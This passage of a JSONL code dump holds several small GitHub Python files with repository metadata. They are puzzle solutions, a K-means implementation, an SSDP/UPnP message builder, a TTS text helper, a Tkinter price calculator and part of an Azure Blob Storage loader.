line[0]\n spaces = int(line[1])\n\n for delta in range(spaces):\n if direction == \"U\":\n y += 1\n elif direction == \"D\":\n y -= 1\n elif direction == \"R\":\n x += 1\n elif direction == \"L\":\n x -= 1\n\n head.append([x, y])\n\n\ndef tail_pos(p1, p2, tail_p):\n px1 = p1[0]\n py1 = p1[1]\n px2 = p2[0]\n py2 = p2[1]\n\n m_delta_x = abs(px2 - px1)\n m_delta_y = abs(py2 - py1)\n\n h_delta_x1 = abs(px1 - tail_p[0])\n h_delta_y1 = abs(py1 - tail_p[1])\n h_delta_x2 = abs(px2 - tail_p[0])\n h_delta_y2 = abs(py2 - tail_p[1])\n\n #print(f\"head moved from {p1} -> {p2}\")\n if m_delta_x == 1 and m_delta_y == 1:\n if h_delta_x2 > 1 or h_delta_y2 > 1:\n #print(\"diagonal move\")\n x_move = px2 - px1\n y_move = py2 - py1\n\n new_t = []\n if h_delta_x2 == 0:\n new_t = [tail_p[0], tail_p[1] + y_move]\n elif h_delta_y2 == 0:\n new_t = [tail_p[0] + x_move, tail_p[1]]\n else:\n new_t = [tail_p[0] + x_move, tail_p[1] + y_move]\n #print(f\"{tail_p=}\")\n #print(f\"{new_t=}\")\n return new_t\n else:\n #print(f\"{tail_p=}\")\n return tail_p\n\n\n if h_delta_x2 > 1:\n #print(f\"head moved away from tail x dir\")\n return [px1, py1]\n elif h_delta_y2 > 1:\n #print(f\"head moved away from tail y dir\")\n return [px1, py1]\n else:\n #print(f\"no move\")\n return tail_p\n\n\ntail = [[0, 0]]\nsnake = [head]\nfor t in range(9):\n # start new tail at same position of the head\n tail = [head[0]]\n\n for i in range(len(head) - 1):\n #print(f\"{tail[i]=}\")\n new_tail = tail_pos(head[i], head[i + 1], tail[i])\n #print(f\"{new_tail=}\")\n tail.append(new_tail)\n\n snake.append(tail)\n head = tail\n\n\n\nnparr = np.array(snake[9])\nunique_tail = np.unique(nparr, axis=0)\nplt.show()\nprint(len(unique_tail))\n","repo_name":"matt-marc/AdventOfCode","sub_path":"2022/day09/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8730700083","text":"def add_time(start, duration, today=None):\r\n time, unit = start.split()\r\n hour_start, minutes_start = time.split(\":\")\r\n hour_duration, minutes_duration = duration.split(\":\")\r\n\r\n hour_start = int(hour_start)\r\n minutes_start = int(minutes_start)\r\n minutes_duration = int(minutes_duration)\r\n hour_duration = int(hour_duration)\r\n\r\n days = [\r\n \"Monday\",\r\n \"Tuesday\",\r\n \"Wednesday\",\r\n \"Thursday\",\r\n \"Friday\",\r\n \"Saturday\",\r\n \"Sunday\",\r\n ]\r\n\r\n num_days = 0\r\n\r\n minutes_start += minutes_duration\r\n minutes_duration = 0\r\n if minutes_start >= 60:\r\n minutes_start = minutes_start % 60\r\n hour_start += 1\r\n\r\n # if only minutes were input\r\n if hour_duration == 0 and hour_start == 12:\r\n if unit == \"AM\":\r\n unit = \"PM\"\r\n else:\r\n unit = \"AM\"\r\n num_days += 1\r\n\r\n while hour_duration != 0:\r\n # resolve hours\r\n hour_start += 1\r\n hour_duration -= 1\r\n\r\n if hour_start >= 12:\r\n hour_start = hour_start % 12\r\n if unit == \"AM\":\r\n unit = \"PM\"\r\n else:\r\n unit = \"AM\"\r\n num_days += 1\r\n\r\n if hour_start == 0:\r\n hour_start = 12\r\n\r\n result_day = 0\r\n\r\n # if today is passed\r\n if today is not None:\r\n result_day = days[(days.index(today.capitalize()) + num_days) % 6]\r\n\r\n # resolve days case\r\n if num_days == 1:\r\n return f\"{hour_start}:{minutes_start:02} {unit} (next day)\"\r\n elif num_days > 1:\r\n return f\"{hour_start}:{minutes_start:02} {unit}, {result_day} ({num_days} days later)\"\r\n else:\r\n return f\"{hour_start}:{minutes_start:02} {unit}, {result_day}\"\r\n else:\r\n # resolve days case\r\n if num_days == 1:\r\n return f\"{hour_start}:{minutes_start:02} {unit} (next day)\"\r\n elif num_days > 1:\r\n return f\"{hour_start}:{minutes_start:02} {unit} ({num_days} days later)\"\r\n else:\r\n return f\"{hour_start}:{minutes_start:02} {unit}\"\r\n\r\n\r\nprint(add_time(\"6:30 PM\", \"205:12\"))\r\n","repo_name":"MustafaHashmani/Freecodecamp-Python-Projects","sub_path":"time-calculator.py","file_name":"time-calculator.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40924846051","text":"'''\r\nCreated on Aug 4, 2013\r\n\r\n@author: Jonathan\r\n'''\r\n\r\nimport time\r\nfrom collections import OrderedDict\r\n\r\nADDRESS = (\"239.255.255.250\", 1900)\r\n\r\ndef initialize(userAgent):\r\n\tglobal USER_AGENT\r\n\tUSER_AGENT = userAgent\r\n\r\ndef getUserAgent():\r\n\tglobal USER_AGENT\r\n\tif \"USER_AGENT\" not in globals():\r\n\t\tUSER_AGENT = \"not/1.0 UPnP/1.1 initialized/2.7\"\r\n\treturn USER_AGENT\r\n\r\nclass Device(object):\r\n\t\r\n\tMAX_BOOT_ID = 2**31 - 1\r\n\tMAX_CONFIG_ID = 2**24 - 1\r\n\t\r\n\tdef __init__(self, uuid, urn, location=None, configId=0, bootId=int(time.time())):\r\n\t\tif not (0 <= int(bootId) <= self.MAX_BOOT_ID): raise ValueError(\"bootId must be between zero and %d\" % self.MAX_BOOT_ID)\r\n\t\tif not (0 <= int(configId) <= self.MAX_CONFIG_ID): raise ValueError(\"configId must be between zero and %d\" % self.MAX_CONFIG_ID)\r\n\t\t\r\n\t\tself._uuid = uuid\r\n\t\tself._urn = urn\r\n\t\tself._configId = int(configId)\r\n\t\tself._bootId = int(bootId)\r\n\t\tself._devices = [] \r\n\t\tself._services = []\r\n\t\tself._location = location\r\n\t\t\r\n\t@property\r\n\tdef uuid(self):\r\n\t\treturn self._uuid\r\n\t\r\n\t@property\r\n\tdef urn(self):\r\n\t\treturn self._urn\r\n\t\r\n\t@property\r\n\tdef configId(self):\r\n\t\treturn self._configId\r\n\t\r\n\t@property\r\n\tdef bootId(self):\r\n\t\treturn self._bootId\r\n\t\r\n\t@property\r\n\tdef devices(self):\r\n\t\treturn self._devices\r\n\t\r\n\t@property\r\n\tdef services(self):\r\n\t\treturn self._services\r\n\t\r\n\t@property\r\n\tdef location(self):\r\n\t\treturn self._location\r\n\t\r\n\tdef updateBootId(self):\r\n\t\tself._bootId = (self._bootId + 1) % (self.MAX_BOOT_ID + 1)\r\n\t\t\r\n\tdef addDevice(self, device):\r\n\t\tself._devices.append(device)\r\n\t\t\r\n\tdef addService(self, service):\r\n\t\tself._services.append(service)\r\n\t\r\nclass Service(object):\r\n\t\r\n\tdef __init__(self, urn):\r\n\t\tself._urn = urn\r\n\t\t\r\n\t@property\r\n\tdef urn(self):\r\n\t\treturn self._urn\r\n\r\ndef formatDate(t):\r\n\treturn time.strftime(\"%a, %d %b %Y %H:%M:%S UTC\", t)\r\n\r\ndef renderMessage(method, headers):\r\n\tHEADER_FORMAT = \"%s: %s\"\r\n\treturn method + \"\\r\\n\" + \"\\r\\n\".join([HEADER_FORMAT % header for header in headers.items()]) + \"\\r\\n\"\r\n\r\ndef parseMessage(message):\r\n\tlines = message.split(\"\\r\\n\")\r\n\theaders = {}\r\n\tfor line in lines[1:]:\r\n\t\tcomponents = line.split(\":\", 1)\r\n\t\tif len(components) == 1:\r\n\t\t\theaders[components[0].strip()] = \"\"\r\n\t\telif len(components) == 2:\r\n\t\t\theaders[components[0].strip()] = components[1].strip()\r\n\treturn lines[0], headers\r\n\r\nNOTIFY_METHOD = \"NOTIFY * HTTP/1.1\"\r\nSEARCH_METHOD = \"M-SEARCH * HTTP/1.1\"\r\nRESPONSE_METHOD = \"HTTP/1.1 200 OK\"\r\n\r\nALIVE_HEADERS = {\"HOST\": \"%s:%d\" % ADDRESS,\r\n\t\t\t\t\"CACHE-CONTROL\": \"\",\r\n\t\t\t\t\"LOCATION\": \"\",\r\n\t\t\t\t\"NT\": \"\",\r\n\t\t\t\t\"NTS\": \"ssdp:alive\",\r\n\t\t\t\t\"SERVER\": \"\",\r\n\t\t\t\t\"USN\": \"\", \r\n\t\t\t\t\"BOOTID.UPNP.ORG\": \"\",\r\n\t\t\t\t\"CONFIGID.UPNP.ORG\": \"\"}\r\n\r\ndef renderAliveMessages(device, maxAge, root=True, headers=ALIVE_HEADERS):\r\n\tmessages = []\r\n\tif root:\r\n\t\theaders[\"CACHE-CONTROL\"] = \"max-age - %d\" % maxAge\r\n\t\theaders[\"LOCATION\"] = device.location\r\n\t\theaders[\"SERVER\"] = getUserAgent()\r\n\t\theaders[\"BOOTID.UPNP.ORG\"] = device.bootId\r\n\t\theaders[\"CONFIGID.UPNP.ORG\"] = device.configId\r\n\t\t\r\n\t\theaders[\"NT\"] = \"upnp:rootdevice\"\r\n\t\theaders[\"USN\"] = \"uuid:%s::upnp:rootdevice\" % device.uuid\r\n\t\tmessages.append(renderMessage(NOTIFY_METHOD, headers))\r\n\t\t\r\n\theaders[\"NT\"] = \"uuid:%s\" % device.uuid\r\n\theaders[\"USN\"] = \"uuid:%s\" % device.uuid\r\n\tmessages.append(renderMessage(NOTIFY_METHOD, headers))\r\n\t\t\r\n\theaders[\"NT\"] = \"urn:%s\" % device.urn\r\n\theaders[\"USN\"] = \"uuid:%s::urn:%s\" % (device.uuid, device.urn)\r\n\tmessages.append(renderMessage(NOTIFY_METHOD, headers))\r\n\t\t\r\n\tfor child in device.devices:\r\n\t\tmessages.extend(renderAliveMessages(child, maxAge, False, headers))\r\n\t\t\r\n\tfor service in device.services:\r\n\t\theaders[\"NT\"] = \"urn:%s\" % service.urn\r\n\t\theaders[\"USN\"] = \"uuid:%s::urn:%s\" % (device.uuid, service.urn)\r\n\t\tmessages.append(renderMessage(NOTIFY_METHOD, headers))\r\n\t\t\r\n\treturn messages\r\n\r\ndef renderDeadMessages(device, maxAge):\r\n\tpass\r\n\r\ndef renderUpdateMessages(device, maxAge):\r\n\tpass\r\n\r\ndef renderSearchResponseMessages(device, maxAge, searchTarget, t=time.gmtime()):\r\n\tpass\r\n\r\ndef renderSearchMessage(maxAge, searchTarget):\r\n\tpass\r\n\r\ndef _renderHeaders(headers):\r\n\tHEADER_FORMAT = \"%s: %s\"\r\n\treturn \"\\r\\n\".join([HEADER_FORMAT % header for header in headers.items()])\r\n\r\nclass _Message(object):\r\n\t\r\n\tdef __init__(self, method, headers):\r\n\t\tself._method = method\r\n\t\tself._headers = headers\r\n\t\r\n\tdef render(self):\r\n\t\treturn self._method + \"\\r\\n\" + _renderHeaders(self._headers) + \"\\r\\n\"\r\n\r\nclass _NotifyMessage(_Message):\r\n\tdef __init__(self, headers):\r\n\t\t_Message.__init__(self, \"NOTIFY * HTTP/1.1\", headers)\r\n\r\nclass SearchMessage(_Message):\r\n\tdef __init__(self, mx, st):\r\n\t\t_Message.__init__(self, \"M-SEARCH * HTTP/1.1\",\r\n\t\t\t\t\t\t OrderedDict([(\"HOST\", \"%s:%d\" % ADDRESS),\r\n\t\t\t\t\t\t\t (\"MAN\", \"\\\"ssdp:discover\\\"\"),\r\n\t\t\t\t\t\t\t (\"MX\", str(mx)),\r\n\t\t\t\t\t\t\t (\"ST\", str(st))]))\r\n\r\nclass ResponseMessage(_Message):\r\n\tdef __init__(self, maxAge, location, st, usn, t=time.gmtime()):\r\n\t\theaders = OrderedDict([(\"CACHE-CONTROL\", \"max-age - \" + str(maxAge)),\r\n\t\t\t\t\t\t\t (\"DATE\", formatDate(t)),\r\n\t\t\t\t\t\t\t (\"EXT\", \"\"),\r\n\t\t\t\t\t\t\t (\"LOCATION\", str(location)),\r\n\t\t\t\t\t\t\t (\"SERVER\", USER_AGENT),\r\n\t\t\t\t\t\t\t (\"ST\", str(st)),\r\n\t\t\t\t\t\t\t (\"USN\", str(usn)),\r\n\t\t\t\t\t\t\t (\"BOOTID.UPNP.ORG\", str(BOOT_ID)),\r\n\t\t\t\t\t\t\t (\"CONFIGID.UPNP.ORG\", str(CONFIG_ID))])\r\n\t\tif SEARCH_PORT is not None:\r\n\t\t\theaders[\"SEARCHPORT.UPNP.ORG\"] = str(SEARCH_PORT)\r\n\t\t\t\r\n\t\t_Message.__init__(self, \"HTTP/1.1 200 OK\", headers)\r\n\r\nclass AliveMessage(_NotifyMessage):\r\n\tdef __init__(self, maxAge, location, nt, usn):\r\n\t\theaders = OrderedDict([(\"HOST\", \"%s:%d\" % ADDRESS),\r\n\t\t\t\t\t\t\t (\"CACHE-CONTROL\", \"max-age - %d\" % maxAge),\r\n\t\t\t\t\t\t\t (\"LOCATION\", str(location)),\r\n\t\t\t\t\t\t\t (\"NT\", str(nt)),\r\n\t\t\t\t\t\t\t (\"NTS\", \"ssdp:alive\"),\r\n\t\t\t\t\t\t\t (\"SERVER\", USER_AGENT),\r\n\t\t\t\t\t\t\t (\"USN\", str(usn)),\r\n\t\t\t\t\t\t\t (\"BOOTID.UPNP.ORG\", str(BOOT_ID)),\r\n\t\t\t\t\t\t\t (\"CONFIGID.UPNP.ORG\", str(CONFIG_ID))])\r\n\t\tif SEARCH_PORT is not None:\r\n\t\t\theaders[\"SEARCHPORT.UPNP.ORG\"] = str(SEARCH_PORT)\r\n\t\t\r\n\t\t_NotifyMessage.__init__(self, headers)\r\n\r\nclass UpdateMessage(_NotifyMessage):\r\n\tpass\r\n\r\nclass DeadMessage(_NotifyMessage):\r\n\tpass","repo_name":"jonathanherbst/pyDLNA","sub_path":"SSDP.py","file_name":"SSDP.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43365138819","text":"from datetime import datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef dist(a, b):\n \"\"\"\n Compute the Euclidean distance between two points\n\n :param a: type: ndarray\n :param b: type: ndarray\n :return: Euclidean distance computed as ||a-b||\n :raise ValueError: If the two arrays have different shapes\n \"\"\"\n if a.shape != b.shape:\n raise ValueError\n return np.sqrt(np.sum(np.square(a - b)))\n\n\ndef get_cluster(arr, centroids):\n \"\"\"\n Assign arr to one of the clusters based on\n least distance to cluster centroid\n :param arr: type: (d,) ndarray\n :param centroids: type: k x d ndarray\n Cluster centroids. Each centroid must have the same shape as arr\n :return: the index of the cluster that arr should be assigned to\n \"\"\"\n min_dist = float('inf')\n assigned = None\n for idx, c in enumerate(centroids):\n d = dist(arr, c)\n if d < min_dist:\n min_dist = d\n assigned = idx\n\n return assigned\n\n\ndef recompute_centroids(X, c, centroids):\n \"\"\"\n Recompute the centroids of each cluster to be the mean of the data points\n in the cluster\n :param X: data points\n :param c: cluster assignments\n :param centroids: matrix of centroids\n :return: new matrix of centroids\n \"\"\"\n new_centroids = []\n for i in range(len(centroids)):\n mask = c == i\n mask = mask.astype(np.float32).reshape(1, c.shape[0])\n c_n = np.count_nonzero(mask)\n new_c = np.sum(np.matmul(mask, X), axis=0) / c_n\n new_centroids.append(new_c)\n\n return np.asarray(new_centroids, dtype=np.float32)\n\n\ndef check_converging(c, new_c, eps):\n \"\"\"\n Returns True if any of the centroids have not moved much\n :param c: previous centroid\n :param new_c: new centroid\n :param eps: expected margin between the previous and new centroid\n to consider them to have not moved\n :return: type: bool\n \"\"\"\n diff = np.sqrt(np.sum(np.square(c - new_c), 1))\n return not np.all(diff <= eps)\n\n\ndef initialize_centroids(X, k):\n \"\"\"\n Initialize k centroids from the given X\n :param X: Data points\n :param k: number of clusters\n :return: Matrix of centroids\n \"\"\"\n centroids = []\n # Choose initial centroid randomly\n np.random.seed(int(datetime.now().timestamp()))\n c_idx = np.random.randint(X.shape[0])\n centroids.append(X[c_idx])\n\n # Calculate the square of Euclidean distance between each data point\n # and the chosen initial centroid. This would be used as a weighted\n # probability distribution to choose the subsequent centroids. This approach\n # ensures that the chosen initial centroids are far away from each other.\n D_x = np.sum(np.square(X - centroids[0]), 1).reshape(X.shape[0])\n D_x = D_x / np.sum(D_x)\n for _ in range(1, k):\n c_idx = np.random.choice(X.shape[0], p=D_x)\n centroids.append(X[c_idx])\n\n centroids = np.asarray(centroids, dtype=np.float32)\n\n return centroids\n\n\ndef do_clustering(X, k):\n \"\"\"\n Do K-Means Clustering to assign each data point in X to one of k clusters\n :param X: Data points\n :param k: number of clusters expected\n :return: the centroids for each cluster and the assignments for the data pts\n \"\"\"\n eps = 0.0003\n centroids = initialize_centroids(X, k)\n\n iteration = 0\n centroids_not_converged = True\n cluster_assignment = np.full(X.shape[0], np.nan, dtype=np.int8)\n while centroids_not_converged:\n for idx, x in enumerate(X):\n cluster_assignment[idx] = get_cluster(x, centroids)\n\n new_centroids = recompute_centroids(X, cluster_assignment, centroids)\n centroids_not_converged = check_converging(centroids, new_centroids,\n eps)\n centroids = new_centroids\n iteration += 1\n\n print(\"Clustering outcome:\")\n print(np.unique(cluster_assignment, return_counts=True))\n visualize_clustering(X, cluster_assignment)\n\n return centroids, cluster_assignment\n\n\ndef visualize_clustering(X, c):\n \"\"\"\n Visualize the cluster assignment of the data points in X after running\n K-Means clustering\n :param X: N x D matrix that contains N D-dimensional data points\n :param c: N dimensional vector that contains the cluster assignment of each data point\n \"\"\"\n fig = plt.figure()\n ax = Axes3D(fig)\n\n for i, config in enumerate([('r', 'o'), ('b', '^')]):\n mask = c == i\n pts = X[mask,:]\n ax.scatter(pts[:, -3], pts[:, -2], pts[:, -1], c=config[0], marker=config[1])\n\n ax.set_xlabel('L')\n ax.set_xlabel('a')\n ax.set_xlabel('b')\n\n plt.show()\n","repo_name":"chenxukun/xukunnachi","sub_path":"KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72160370713","text":"\"\"\" from https://github.com/keithito/tacotron \"\"\"\nfrom text import cleaners\nfrom text.symbols import symbols, cleaner_symbols\n\n# 기본 Mappings\n_symbol_to_id = {s: i for i, s in enumerate(symbols)}\n_id_to_symbol = {i: s for i, s in enumerate(symbols)}\n\ndef _update_symbols(cleaner_name):\n \"\"\" Update symbols based on cleaner \"\"\"\n global _symbol_to_id, _id_to_symbol\n if cleaner_name in cleaner_symbols:\n choice_symbols = cleaner_symbols[cleaner_name]\n current_symbols = [choice_symbols['_pad']] + list(choice_symbols['_punctuation']) + list(choice_symbols['_letters'])\n _symbol_to_id = {s: i for i, s in enumerate(current_symbols)}\n _id_to_symbol = {i: s for i, s in enumerate(current_symbols)}\n\ndef text_to_sequence(text, cleaner_names):\n '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.'''\n sequence = []\n clean_text = _clean_text(text, cleaner_names)\n\n # Update symbols for the current cleaner\n # if cleaner_names:\n # _update_symbols(cleaner_names[0])\n\n for symbol in clean_text:\n if symbol not in _symbol_to_id.keys():\n continue\n symbol_id = _symbol_to_id[symbol]\n sequence += [symbol_id]\n return sequence\n\n\ndef cleaned_text_to_sequence(cleaned_text):\n '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.\n Args:\n text: string to convert to a sequence\n Returns:\n List of integers corresponding to the symbols in the text\n '''\n sequence = [_symbol_to_id[symbol] for symbol in cleaned_text if symbol in _symbol_to_id.keys()]\n return sequence\n\n\ndef sequence_to_text(sequence):\n '''Converts a sequence of IDs back to a string'''\n result = ''\n for symbol_id in sequence:\n s = _id_to_symbol[symbol_id]\n result += s\n return result\n\n\ndef _clean_text(text, cleaner_names):\n for name in cleaner_names:\n cleaner = getattr(cleaners, name)\n if not cleaner:\n raise Exception('Unknown cleaner: %s' % name)\n text = cleaner(text)\n for char in text:\n if char not in symbols:\n text.replace(char, '')\n return text\n","repo_name":"Roista57/vits-webui","sub_path":"text/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"814936809","text":"\"\"\"\nThis solution doesn't pass one of the performance tests.\n\"\"\"\ndef solution(A):\n if len(A) <= 1:\n return 0\n deltas = [y - x for x, y in zip(A[:-1], A[1:])]\n return max(max_profit(deltas), 0)\n\n\ndef max_profit(A):\n value, _, _ = max_slice(A, 0, len(A)-1)\n return value\n\n\ndef max_slice(A, p, q):\n if p == q:\n return A[p], p, q\n \n m = (p + q)//2\n l_sum, l_start, l_end = max_slice(A, p, m)\n r_sum, r_start, r_end = max_slice(A, m+1, q)\n m_sum, m_start, m_end = max_crossing_slice(A, p, m, q)\n \n best = max(l_sum, r_sum, m_sum)\n if best == l_sum:\n return l_sum, l_start, l_end\n elif best == r_sum:\n return r_sum, r_start, r_end\n else:\n return m_sum, m_start, m_end\n\n\ndef max_crossing_slice(A, p, m, q):\n left_sum, left_index = float('-inf'), None\n curr = 0\n for i in range(m, p-1, -1):\n curr += A[i]\n if curr > left_sum:\n left_sum = curr\n left_index = i\n right_sum, right_index = float('-inf'), None\n curr = 0\n for j in range(m+1, q+1):\n curr += A[j]\n if curr > right_sum:\n right_sum = curr\n right_index = j\n return (left_sum + right_sum), left_index, right_index\n\nif __name__ == '__main__':\n assert solution([23171, 21011, 21123, 21013, 21367]) == 356\n\n","repo_name":"devforfu/codility","sub_path":"maxprofit2.py","file_name":"maxprofit2.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18889221657","text":"\"\"\"\n Given a sequence of n integers a1, a2, ..., an, a 132 pattern is a subsequence ai, aj, ak such that i < j < k and ai < ak < aj. Design an algorithm that takes a list of n numbers as input and checks whether there is a 132 pattern in the list.\n\nNote: n will be less than 15,000.\n\nExample 1:\n\nInput: [1, 2, 3, 4]\n\nOutput: False\n\nExplanation: There is no 132 pattern in the sequence.\n\nExample 2:\n\nInput: [3, 1, 4, 2]\n\nOutput: True\n\nExplanation: There is a 132 pattern in the sequence: [1, 4, 2].\n\nExample 3:\n\nInput: [-1, 3, 2, 0]\n\nOutput: True\n\nExplanation: There are three 132 patterns in the sequence: [-1, 3, 2], [-1, 3, 0] and [-1, 2, 0].\n\n\"\"\"\nclass Solution(object):\n def find132pattern(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n 1139ms\n \"\"\"\n if len(nums)<=2:\n return False\n temp=nums[0]\n count=0\n start=temp\n end=temp\n for i in nums:\n if i<=temp:\n temp=i\n count+=1\n else:\n start=temp\n break\n # if count==len(nums):\n # return False\n for i in nums[count:]:\n if i>temp:\n temp=i\n count+=1\n else:\n end=temp\n break\n print(count,start,end)\n start_1=start\n end_1=end\n stack=[[start,end]]\n for i in nums[count:]:\n for j in stack:\n if i>j[0] and i= i:\n start_1 = i\n if i > start_1:\n end_1 = i\n if stack[-1][0]>end_1:\n stack.append([start_1, end_1])\n else:\n while len(stack)>0:\n a=stack.pop()\n if a[1]>=end_1 or len(stack)==0:\n stack.append([start_1, max(end_1,a[1])])\n break\n print(i,stack)\n return False\n\n def find132pattern_1(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n 69ms\n \"\"\"\n n = len(nums)\n sta = []\n a2 = -2 ** 31\n for i in range(n - 1, -1, -1):\n if nums[i] < a2:\n return True\n if not sta or sta[-1] >= nums[i]:\n sta.append(nums[i])\n else:\n while sta and sta[-1] < nums[i]:\n a2 = sta.pop()\n sta.append(nums[i])\n return False\n\n def find132pattern_2(self, nums):\n \"\"\"\n 66ms\n :param nums:\n :return:\n \"\"\"\n if len(nums) < 3:\n return False\n\n stack = [[nums[0], nums[0]]]\n minimum = nums[0]\n for num in nums[1:]:\n if num <= minimum:\n minimum = num\n else:\n while stack and num > stack[-1][0]:\n if num < stack[-1][1]:\n return True\n else:\n stack.pop()\n stack.append([minimum, num])\n\n return False\n\n def find132pattern_4(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n 68ms\n \"\"\"\n if len(nums)<=2:\n return False\n temp=nums[0]\n count=0\n start=temp\n end=temp\n for i in nums:\n if i<=temp:\n temp=i\n count+=1\n else:\n start=temp\n break\n # if count==len(nums):\n # return False\n for i in nums[count:]:\n if i>temp:\n temp=i\n count+=1\n else:\n end=temp\n break\n stack=[[start,end]]\n minm=start\n for i in nums[count:]:\n if i<=minm:\n minm=i\n else:\n while stack and i > stack[-1][0]:\n a = stack.pop()\n if i < a[1]:\n return True\n stack.append([minm, i])\n print(stack)\n return False\n\n\n# nums=[0,0,-1,-2,-1,0,1,1,-3,-3,4,4,2]\n# print(Solution().find132pattern(nums))\n#\n# nums=[0,1,2,3,4,5]\n# print(Solution().find132pattern(nums))\n#\n# nums=[0,-1,-2,-3,-4,-5]\n# print(Solution().find132pattern(nums))\n\nnums=[8,10,4,6,1,11,3,5]\nprint(Solution().find132pattern_4(nums))\n\nnums=[8,10,4,6,5]\nprint(Solution().find132pattern_4(nums))\n\nnums=[3, 1, 4, 2]\nprint(Solution().find132pattern_4(nums))\n\nnums=[2,3,1,2]\nprint(Solution().find132pattern_4(nums))","repo_name":"953250587/leetcode-python","sub_path":"OneTwoThreePattern_MID_456.py","file_name":"OneTwoThreePattern_MID_456.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39697186539","text":"\r\nimport tkinter as tk\r\n\r\ndef calculate_price():\r\n selected_car = car_var.get()\r\n selected_feature = feature_var.get()\r\n\r\n if selected_car == \"Ford\":\r\n if selected_feature == \"çelik jant\":\r\n price = 800000 + 20000\r\n elif selected_feature == \"sunroof\":\r\n price = 800000 + 30000\r\n elif selected_feature == \"ses sistemi\":\r\n price = 800000 + 15000\r\n elif selected_feature == \"kablosuz şarj\":\r\n price = 800000 + 5000\r\n else:\r\n price = 800000\r\n\r\n elif selected_car == \"BMW\":\r\n if selected_feature == \"çelik jant\":\r\n price = 1800000 + 40000\r\n elif selected_feature == \"sunroof\":\r\n price = 1800000 + 45000\r\n elif selected_feature == \"ses sistemi\":\r\n price = 1800000 + 25000\r\n elif selected_feature == \"kablosuz şarj\":\r\n price = 1800000 + 10000\r\n else:\r\n price = 1800000\r\n\r\n elif selected_car == \"Audi\":\r\n if selected_feature == \"çelik jant\":\r\n price = 2000000 + 70000\r\n elif selected_feature == \"sunroof\":\r\n price = 2000000 + 75000\r\n elif selected_feature == \"ses sistemi\":\r\n price = 2000000 + 55000\r\n elif selected_feature == \"kablosuz şarj\":\r\n price = 2000000 + 20000\r\n else:\r\n price = 2000000\r\n\r\n price_label.config(text=\"Fiyat: {} TL\".format(price))\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Araç Fiyat Hesaplama sistemi\")\r\n\r\ncar_label = tk.Label(root, text=\"Araç Seçin:\")\r\ncar_label.pack()\r\n\r\ncar_var = tk.StringVar()\r\ncar_choices = [\"Ford\", \"BMW\", \"Audi\"]\r\ncar_dropdown = tk.OptionMenu(root, car_var, *car_choices)\r\ncar_dropdown.pack()\r\n\r\nfeature_label = tk.Label(root, text=\"İlave Özellik Seçin:\")\r\nfeature_label.pack()\r\n\r\nfeature_var = tk.StringVar()\r\nfeature_choices = [\"çelik jant\", \"sunroof\", \"ses sistemi\", \"kablosuz şarj\"]\r\nfeature_dropdown = tk.OptionMenu(root, feature_var, *feature_choices)\r\nfeature_dropdown.pack()\r\n\r\ncalculate_button = tk.Button(root, text=\"Fiyatı Hesapla\", command=calculate_price)\r\ncalculate_button.pack()\r\n\r\nprice_label = tk.Label(root, text=\" Fiyatı: -\")\r\nprice_label.pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"firatgunay/Tkinter","sub_path":"carSelection.py","file_name":"carSelection.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5369074339","text":"import pandas as pd\nfrom azure.storage.blob import (\n BlobServiceClient,\n ContainerClient,\n StorageStreamDownloader,\n)\nimport os\nimport io\nimport pypdf\nimport re\nimport logging\n\n\nclass AzureBlobStorageDocumentLoader:\n \"\"\"\n Class that load files from blob storage, then you can transform this files\n in a pd Dataframe.\n\n Parameters:\n account_key (str): this is the key, usually is charge in the environment\n Defaults to 'westdraid001'\n account_name (str, optional): the name of the azure account\n Defaults to 'tests-gpt-neoris'\n container_name (str, optional): the name of the azure blob container\n prefix (str, optional): the beginning of the path where you want to search and load the files\n Defaults to 'EMBEDDINGS_TEST/ai_papers_segmented'\n \"\"\"\n\n def __init__(\n self,\n account_key: str,\n account_name: str = \"westdraid001\",\n container_name: str = \"tests-gpt-neoris\",\n prefix: str = \"EMBEDDINGS_TEST/langchain\",\n ):\n self.account_name = account_name\n self.account_key = account_key\n self.container_name = container_name\n self.prefix = prefix\n\n def __connect_blob_storage(self) -> ContainerClient:\n \"\"\"\n Connects to an Azure Blob Storage container using the provided account credentials.\n\n This function creates a connection to an Azure Blob Storage container using the\n specified account name, account key, and container name. It returns a ContainerClient\n object that can be used to interact with the container.\n\n Parameters\n ------------\n self\n\n Returns\n -------\n ContainerClient:\n A client object for interacting with the specified container.\n \"\"\"\n string_connection = self.__string_connection_blob_storage()\n service_client = BlobServiceClient.from_connection_string(string_connection)\n container_client = service_client.get_container_client(self.container_name)\n logging.info(\"Connection to Container succesful\")\n\n return container_client\n\n def __string_connection_blob_storage(self) -> str:\n \"\"\"\n Generate a connection string for Azure Blob Storage.\n\n This private method constructs a connection string for Azure Blob Storage using the provided account name and account key.\n\n Returns:\n str: A connection string for Azure Blob Storage.\n\n Example:\n instance = BlobStorageConnection(account_name='myaccount', 